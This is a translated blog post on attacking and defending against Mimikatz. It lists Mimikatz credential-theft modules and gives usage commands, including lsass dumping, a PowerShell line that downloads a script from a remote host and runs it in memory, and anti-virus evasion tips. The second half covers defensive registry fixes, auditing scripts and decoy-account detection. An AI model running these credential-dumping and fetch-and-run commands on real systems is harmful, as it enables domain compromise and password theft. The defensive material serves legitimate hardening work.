Mimikatz attack and defense summary

 

  Mimikatz is a lightweight debugging tool written by the Frenchman Benjamin Delpy. During network penetration tests it is most often used as a tool to grab users' passwords, but Mimikatz is not limited to that: it can also create tickets, pass tickets, pass hashes and even forge domain administrator credential tokens.

 

Features

 

  • CRYPTO::Certificates - lists and exports certificates and their credentials.

  • KERBEROS::Golden - creates a golden ticket / silver ticket / trust ticket.

  • KERBEROS::List - lists all of the current user's tickets (TGT and TGS) held in memory.

  • KERBEROS::PTT - pass the ticket.

  • LSADUMP::DCSync - asks a DC to synchronize an object (retrieves the account's password data).

  • LSADUMP::LSA - asks the LSA server to retrieve SAM/AD data (normal or "patch" mode); it can also work from an lsass.dmp dump file. Exports all Active Directory domain credential data, and can also obtain the credentials of a specified account such as krbtgt via the /name parameter, e.g. "/name:krbtgt".

  • LSADUMP::SAM - obtains the SysKey needed to decrypt SAM entries (from the live registry or an exported hive). It connects to the local Security Accounts Manager (SAM) database and dumps the credentials of local accounts; it can be used to dump every local credential on a Windows computer.

  • LSADUMP::Trust - asks the LSA server to retrieve trust authentication information (normal or patch mode); dumps all trust keys (passwords) for domain or forest trusts.

  • MISC::AddSid - adds entries to a user account's SID history. The first value is the target account, the second is the account/group name (several names or SIDs may be given).

  • MISC::MemSSP - injects a malicious Windows SSP to record local authentication credentials.

  • MISC::Skeleton - injects a Skeleton Key into the LSASS process of a DC. Afterwards every user can authenticate with the "master password" (the Skeleton Key) as well as with their own usual password.

  • PRIVILEGE::Debug - obtains the Debug privilege (many Mimikatz commands require the Debug privilege or local SYSTEM rights).

  • SEKURLSA::Ekeys - lists Kerberos keys.

  • SEKURLSA::Kerberos - lists the Kerberos credentials of all authenticated users (including service accounts and computer accounts).

  • SEKURLSA::Krbtgt - obtains the password data of the domain's Kerberos service account (KRBTGT).

  • SEKURLSA::LogonPasswords - lists all available provider credentials. This command typically shows the credentials of recently logged-on users and computers.

  • SEKURLSA::Pth - Pass-the-Hash and Over-Pass-the-Hash (note: Over-Pass-the-Hash actually passes the relevant key(s)).

  • SEKURLSA::Tickets - lists all available Kerberos tickets of recently authenticated users, including services running in a user account's context and the local computer's AD computer account. Unlike kerberos::list, sekurlsa reads memory in a different way and is not subject to the key-export restriction.

  • TOKEN::List - lists all tokens on the system.

  • TOKEN::Elevate - impersonates a token. Used to elevate to SYSTEM (default) or to a domain administrator whose token is found on the computer.

  • TOKEN::Elevate /domainadmin - impersonates a token carrying domain administrator credentials.

 

 

Usage

# 001 Generic usage

privilege::debug - elevate privileges

(Note: must be run with administrator privileges.)

sekurlsa::logonpasswords

Obtain the logon information saved in memory.

(Note: on Windows 10 / 2012 R2 and above, plaintext password caching is disabled by default; it can be re-enabled by modifying the registry, but the target machine must be rebooted and the user must log on again before the password can be captured.)

 

# 002 Running Mimikatz from PowerShell

powershell -exec bypass "import-module ./Invoke-Cats.ps1;Invoke-Cats -pwds"

(Executing the ps1 script directly is, like running the EXE above, easily caught by anti-virus unless it is specially treated.)

powershell.exe "IEX (New-Object Net.WebClient).DownloadString ('http://1.1.1.1/InvokeCats.ps1');Invoke-Cats -pwds"

(This method uses PowerShell to load Mimikatz directly into memory; the file never touches disk, which gets past some anti-virus products.)

 

# 003 Running Mimikatz with cscript

cscript katz.js

(Note: the JS version of Mimikatz has already been flagged by the major anti-virus products and is easily caught, but the JS version is also very easy to get past anti-virus; after simple obfuscation the script passes.)

# 004 Running Mimikatz with .NET 2.0

Run in PowerShell:

$key = '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'
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:regsvcs.dll /keyfile:key.snk /unsafe katz.cs
regsvcs.exe regsvcs.dll

 

 

#005 Running Mimikatz with .NET 4.0

MSBuild katz.xml

#006 Running the XSL version of Mimikatz with wmic

#007 lsass memory dump

Find lsass.exe in Task Manager and dump it, then export the information offline with mimikatz:

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

#008 Exporting lsass memory with procdump (mysqldump can also do this)

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

 

 

Defensive measures

#001 Disable the Debug Privilege

       The Debug Privilege allows a program started by a privileged user to debug services running on the local system.

As shown in the figure below, by default it is assigned to Administrator.

       After clearing the Debug Privilege assignment and restarting the server so the change takes effect, running Mimikatz again shows that it can no longer be used.

#002 WDigest

       WDigest was introduced by Windows in XP; it is used mainly for authentication exchanges together with the Hypertext Transfer Protocol (HTTP) and the Simple Authentication and Security Layer (SASL). Digest, like NTLM, is a challenge-response authentication protocol.

In short:

    1. The client sends an authentication request to the server.

    2. The server returns a random value; the client uses the password held in memory together with the client name, domain name and other information to compute a value and sends it to the server.

    3. The server computes a value the same way; if it matches the client's, authentication succeeds.

   Up to Windows 7 and 2008 R2, WDigest was enabled by default and could not be disabled; the KB 2871997 patch has to be installed in addition (on systems after Win7 and 08, Microsoft disables the WDigest protocol by default).

As shown in the figure below (a 2008 system), the WDigest registry key has no UseLogonCredential value, so plaintext passwords can be captured successfully.

After installing the KB 2871997 patch, use the following command:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0

to modify the registry. Once it has been modified, re-running mimikatz can no longer capture plaintext passwords.

 

#003 Domain Cached Credentials

       Domain Cached Credentials, DCC for short, also called mscache. There are two versions: the XP/2003-era one is the first generation, and the one from Vista/2008 onwards is the second generation.

After a computer joins a domain it must authenticate via Kerberos, and Kerberos authentication requires the domain controller to take part. But if a domain member temporarily cannot reach the domain controller, does that mean it cannot authenticate at all? Domain credential caching exists to solve this problem: if the domain controller is temporarily unreachable, Windows tries to authenticate with the credentials cached on the local machine; ten entries are cached by default. (Quoted from: Mimikatz 攻防杂谈)

So if we change the default cache count to 0, we may to some extent prevent Mimikatz attacks.
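The following script is an added example, not part of the original post: it audits the three settings discussed in #001 to #003 (the Debug privilege assignment, WDigest UseLogonCredential and the cached-logon count) and, with -Fix, applies the two registry changes. The registry paths and value names are the real Windows locations; the target values of 0 are the ones the post recommends.

```powershell
# Added example, not part of the original post. Run from an elevated PowerShell.
param([switch]$Fix)

$wdigestKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$winlogonKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$findings = @()

# 1. Debug privilege: export the local user-rights assignments and look for SeDebugPrivilege.
#    secedit omits the line entirely when the right is assigned to nobody.
$cfg = Join-Path $env:TEMP 'user_rights.inf'
secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
$m = Select-String -Path $cfg -Pattern '^SeDebugPrivilege\s*=\s*(.+)$'
Remove-Item $cfg -ErrorAction SilentlyContinue
if ($m) { $findings += "SeDebugPrivilege assigned to: $($m.Matches[0].Groups[1].Value.Trim()) (post recommends clearing it)" }
else    { $findings += 'SeDebugPrivilege: not assigned to anyone (OK)' }

# 2. WDigest: a missing value or a value of 1 means LSASS keeps plaintext passwords in memory.
$ulc = (Get-ItemProperty -Path $wdigestKey -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential
if ($null -eq $ulc -or $ulc -ne 0) {
    $shown = if ($null -eq $ulc) { '<missing>' } else { $ulc }
    $findings += "WDigest UseLogonCredential = $shown (plaintext passwords can be dumped)"
    if ($Fix) { New-ItemProperty -Path $wdigestKey -Name UseLogonCredential -PropertyType DWord -Value 0 -Force | Out-Null }
} else { $findings += 'WDigest UseLogonCredential = 0 (OK)' }

# 3. Cached domain credentials: CachedLogonsCount is a REG_SZ whose default is "10".
$clc = (Get-ItemProperty -Path $winlogonKey -Name CachedLogonsCount -ErrorAction SilentlyContinue).CachedLogonsCount
if ($null -eq $clc -or [int]$clc -gt 0) {
    $shown = if ($null -eq $clc) { '<missing, default 10>' } else { $clc }
    $findings += "CachedLogonsCount = $shown (cached domain credentials can be dumped offline)"
    if ($Fix) { Set-ItemProperty -Path $winlogonKey -Name CachedLogonsCount -Value '0' -Type String }
} else { $findings += 'CachedLogonsCount = 0 (OK)' }

$findings
if ($Fix) { Write-Host 'Registry values set; the WDigest change needs a reboot (or fresh logons) before it takes effect.' }
```

Setting CachedLogonsCount to 0 means domain users cannot log on while no domain controller is reachable, so apply it to servers rather than roaming laptops. Clearing the Debug privilege itself is still done through the Local Security Policy as the post describes; the script only reports who holds it.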

 

#004 Detecting Mimikatz attacks with fake domain users

       Use a tool to write fake domain account credentials into the memory of servers in the domain. When such a server is attacked with mimikatz, the attacker obtains the fake account information we planted; as soon as the attacker uses it to log on to a machine in the domain, we can catch the attack on an IDS or other monitoring device.
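As an added example of the monitoring side of this technique (not from the original post), the script below queries the Security log for logon and Kerberos ticket events that name one of the planted decoy accounts. The account names in $HoneyAccounts are assumed placeholders; substitute the decoys you actually planted. Run it on domain controllers (events 4768/4771) and on member servers (events 4624/4625).

```powershell
# Added example, not part of the original post.
param(
    [string[]]$HoneyAccounts = @('svc_backup_adm', 'helpdesk_da'),   # assumed decoy names, replace with yours
    [int]$LookbackHours = 24
)

$filter = @{
    LogName   = 'Security'
    Id        = 4624, 4625, 4768, 4771   # logon ok / logon failed / TGT issued / Kerberos pre-auth failed
    StartTime = (Get-Date).AddHours(-$LookbackHours)
}

$hits = foreach ($e in Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue) {
    # Read fields by name from the event XML; positional Properties[] indexes differ between event IDs.
    $data = @{}
    foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.GetAttribute('Name')] = $d.InnerText }
    $user = $data['TargetUserName']
    if ($user -and ($HoneyAccounts -contains $user)) {
        [pscustomobject]@{
            Time      = $e.TimeCreated
            EventId   = $e.Id
            Account   = $user
            Domain    = $data['TargetDomainName']
            LogonType = $data['LogonType']          # empty for 4768/4771
            Source    = if ($data['IpAddress']) { $data['IpAddress'] } else { $data['WorkstationName'] }
            Host      = $e.MachineName
        }
    }
}

if ($hits) {
    $hits | Sort-Object Time | Format-Table -AutoSize
    Write-Warning "$(@($hits).Count) event(s) involving decoy accounts: nothing legitimate should ever use them, so treat every source host as suspect."
} else {
    "No decoy-account activity in the Security log over the last $LookbackHours hours."
}
```

The same match on TargetUserName can be expressed as a rule in whatever SIEM or IDS collects these events, which is how the post suggests catching the attacker.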

 

Summary

       Mimikatz offers many attack techniques and has numerous variants, so defending against it completely is fairly difficult. But by combining several measures we can still achieve a degree of defense against Mimikatz.

    If operations staff keep server operating systems updated and install patches promptly, avoid giving accounts excessive administrative rights, add important accounts to the Protected Users group, always log domain accounts off the servers they have logged on to, or plant fake accounts and monitor them, these measures can still provide effective defense to some extent.


Source: www.cnblogs.com/gendan5/p/11611802.html